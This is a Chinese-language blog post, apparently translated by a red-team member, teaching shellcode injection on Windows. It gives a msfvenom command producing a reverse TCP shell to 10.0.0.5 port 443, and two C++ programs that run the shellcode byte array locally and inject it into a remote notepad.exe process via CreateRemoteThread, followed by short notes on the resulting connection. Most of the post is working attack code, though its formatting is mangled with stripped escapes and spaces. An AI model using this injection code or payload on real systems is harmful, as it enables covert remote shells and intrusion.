【翻译】创建线程shellcode注入

2019-09-24 15:48:36 浏览数 (1)

本文作者:Ovpirit_Three(Ms08067红队小组成员)

注入shellcode进入一个本地进程

这次实现探索了将shellcode注入进程内存并执行它的一些经典方法

一、执行shellcode在本地进程

一个简单的关于如何直接执行一个c 程序的shellcode的测试

为逆向的shell生成shell代码:

命令如下:

msfvenom -p windows/x64/shell_reverse_tcpLHOST=10.0.0.5LPORT=443-f c -b x00x0ax0d

c 代码注入和调用shellcode:

代码语言:javascript复制
inject-local-process.cpp
#include"stdafx.h"
#include"Windows.h"
intmain()
{
Unsignedchar shellcode[]=
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbx1dxbexa2x7bx2bx90xe1xecx48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4xe1xf6x21x9fxdbx78"
"x21xecx1dxbexe3x2ax6axc0xb3xbdx4bxf6x93xa9x4e"
"xd8x6axbex7dxf6x29x29x33xd8x6axbex3dxf6x29x09"
"x7bxd8xeex5bx57xf4xefx4axe2xd8xd0x2cxb1x82xc3"
"x07x29xbcxc1xadxdcx77xafx3ax2ax51x03x01x4fxff"
"xf3x33xa0xc2xc1x67x5fx82xeax7axfbx1bx61x64x1d"
"xbexa2x33xaex50x95x8bx55xbfx72x2bxa0xd8xf9xa8"
"x96xfex82x32x2ax40x02xbax55x41x6bx3axa0xa4x69"
"xa4x1cx68xefx4axe2xd8xd0x2cxb1xffx63xb2x26xd1"
"xe0x2dx25x5exd7x8ax67x93xadxc8x15xfbx9bxaax5e"
"x48xb9xa8x96xfex86x32x2ax40x87xadx96xb2xeax3f"
"xa0xd0xfdxa5x1cx6exe3xf0x2fx18xa9xedxcdxffxfa"
"x3ax73xcexb8xb6x5cxe6xe3x22x6axcaxa9x6fxf1x9e"
"xe3x29xd4x70xb9xadx44xe4xeaxf0x39x79xb6x13xe2"
"x41xffx32x95xe7x92xdex42x8dx90x7bx2bxd1xb7xa5"
"x94x58xeaxfaxc7x30xe0xecx1dxf7x2bx9ex62x2cxe3"
"xecx1cx05xa8x7bx2bx95xa0xb8x54x37x46x37xa2x61"
"xa0x56x51xc9x84x7cxd4x45xadx65xf7xd6xa3x7ax2b"
"x90xb8xadxa7x97x22x10x2bx6fx34xbcx4dxf3x93xb2"
"x66xa1x21xa4xe2x7exeaxf2xe9xd8x1ex2cx55x37x63"
"x3ax91x7axeex33xfdx41x77x33xa2x57x8bxfcx5cxe6"
"xeexf2xc9xd8x68x15x5cx04x3bxdex5fxf1x1ex39x55"
"x3fx66x3bx29x90xe1xa5xa5xddxcfx1fx2bx90xe1xec"
"x1dxffxf2x3ax7bxd8x68x0ex4axe9xf5x36x1ax50x8b"
"xe1x44xffxf2x99xd7xf6x26xa8x39xeaxa3x7ax63x1d"
"xa5xc8x05x78xa2x13x63x19x07xbax4dxffxf2x3ax7b"
"xd1xb1xa5xe2x7exe3x2bx62x6fx29xa1x94x7fxeexf2"
"xeaxd1x5bx95xd1x81x24x84xfexd8xd0x3ex55x41x68"
"xf0x25xd1x5bxe4x9axa3xc2x84xfex2bx11x59xbfxe8"
"xe3xc1x8dx05x5cx71xe2x6bxeaxf8xefxb8xddxeax61"
"xb4x22x80xcbxe5xe4x57x5axadxd0x14x41x90xb8xad"
"x94x64x5dxaex2bx90xe1xec";
void*exec =VirtualAlloc(0,sizeofshellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
memcpy(exec,shellcode,sizeofshellcode);
((void(*)())exec)();
return0;
}

在编译之前,出于好奇,让我们看看在反汇编器中生成的shellcode二进制代码,这样我们就可以大致了解我们的c 代码是如何翻译成x64的机器码的:

同样出于好奇,想要去观察这个被注入的shellcode在被注入的进程中是什么样子的并且他的实际位置在哪里。生成一个32bit的shellcode的二进制代码(msfvenom -p windows/shell_reverse_tcpLHOST=10.0.0.5 LPORT=443 -f c -b x00x0ax0d),这个二进制代码是被很好的定位在主线程的栈中

返回到x64位shellcode中-编译并且执行这个二进制代码,它给了我们预期的反向shell

二、在远程进程中执行shellcode

下面的代码将会把shellcode注入到PID为5428的notepad.exe的进程中,他将会初始化一个反向的shell返回到攻击者处

inject-remote-process.cpp

代码语言:javascript复制
#include"stdafx.h"
#include"Windows.h"
intmain(intargc,char*argv[])
{
unsignedcharshellcode[]=
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbx1dxbexa2x7bx2bx90xe1xecx48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4xe1xf6x21x9fxdbx78"
"x21xecx1dxbexe3x2ax6axc0xb3xbdx4bxf6x93xa9x4e"
"xd8x6axbex7dxf6x29x29x33xd8x6axbex3dxf6x29x09"
"x7bxd8xeex5bx57xf4xefx4axe2xd8xd0x2cxb1x82xc3"
"x07x29xbcxc1xadxdcx77xafx3ax2ax51x03x01x4fxff"
"xf3x33xa0xc2xc1x67x5fx82xeax7axfbx1bx61x64x1d"
"xbexa2x33xaex50x95x8bx55xbfx72x2bxa0xd8xf9xa8"
"x96xfex82x32x2ax40x02xbax55x41x6bx3axa0xa4x69"
"xa4x1cx68xefx4axe2xd8xd0x2cxb1xffx63xb2x26xd1"
"xe0x2dx25x5exd7x8ax67x93xadxc8x15xfbx9bxaax5e"
"x48xb9xa8x96xfex86x32x2ax40x87xadx96xb2xeax3f"
"xa0xd0xfdxa5x1cx6exe3xf0x2fx18xa9xedxcdxffxfa"
"x3ax73xcexb8xb6x5cxe6xe3x22x6axcaxa9x6fxf1x9e"
"xe3x29xd4x70xb9xadx44xe4xeaxf0x39x79xb6x13xe2"
"x41xffx32x95xe7x92xdex42x8dx90x7bx2bxd1xb7xa5"
"x94x58xeaxfaxc7x30xe0xecx1dxf7x2bx9ex62x2cxe3"
"xecx1cx05xa8x7bx2bx95xa0xb8x54x37x46x37xa2x61"
"xa0x56x51xc9x84x7cxd4x45xadx65xf7xd6xa3x7ax2b"
"x90xb8xadxa7x97x22x10x2bx6fx34xbcx4dxf3x93xb2"
"x66xa1x21xa4xe2x7exeaxf2xe9xd8x1ex2cx55x37x63"
"x3ax91x7axeex33xfdx41x77x33xa2x57x8bxfcx5cxe6"
"xeexf2xc9xd8x68x15x5cx04x3bxdex5fxf1x1ex39x55"
"x3fx66x3bx29x90xe1xa5xa5xddxcfx1fx2bx90xe1xec"
"x1dxffxf2x3ax7bxd8x68x0ex4axe9xf5x36x1ax50x8b"
"xe1x44xffxf2x99xd7xf6x26xa8x39xeaxa3x7ax63x1d"
"xa5xc8x05x78xa2x13x63x19x07xbax4dxffxf2x3ax7b"
"xd1xb1xa5xe2x7exe3x2bx62x6fx29xa1x94x7fxeexf2"
"xeaxd1x5bx95xd1x81x24x84xfexd8xd0x3ex55x41x68"
"xf0x25xd1x5bxe4x9axa3xc2x84xfex2bx11x59xbfxe8"
"xe3xc1x8dx05x5cx71xe2x6bxeaxf8xefxb8xddxeax61"
"xb4x22x80xcbxe5xe4x57x5axadxd0x14x41x90xb8xad"
"x94x64x5dxaex2bx90xe1xec";
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
printf("Injectingto PID: %i",atoi(argv[1]));
processHandle =OpenProcess(PROCESS_ALL_ACCESS,FALSE,DWORD(atoi(argv[1])));
remoteBuffer =VirtualAllocEx(processHandle,NULL,sizeofshellcode,(MEM_RESERVE |MEM_COMMIT),PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle,remoteBuffer,shellcode,sizeofshellcode,NULL);
remoteThread =CreateRemoteThread(processHandle,NULL,0,(LPTHREAD_START_ROUTINE)remoteBuffer,NULL,0,NULL);
CloseHandle(processHandle);
return0;
}

在展示shellcode注入notepad之前,它并没有任何TCP连接

现在:一旦代码编译并执行,监视API调用的系统就会发现notepad正在做一些它本不应该做的事情——生成cmd.exe并启动TCP连接:

在ProcExplorer中检查记事本再次显示了一个已建立的TCP连接,带着cmd.exe作为子进程建立的

注意,notepad加载了一个ws2_32.dll模块,在正常情况下,这个模块不应该发生,因为该模块负责socket管理

shell 网络安全 c++ notepad ++ 打包

0 人点赞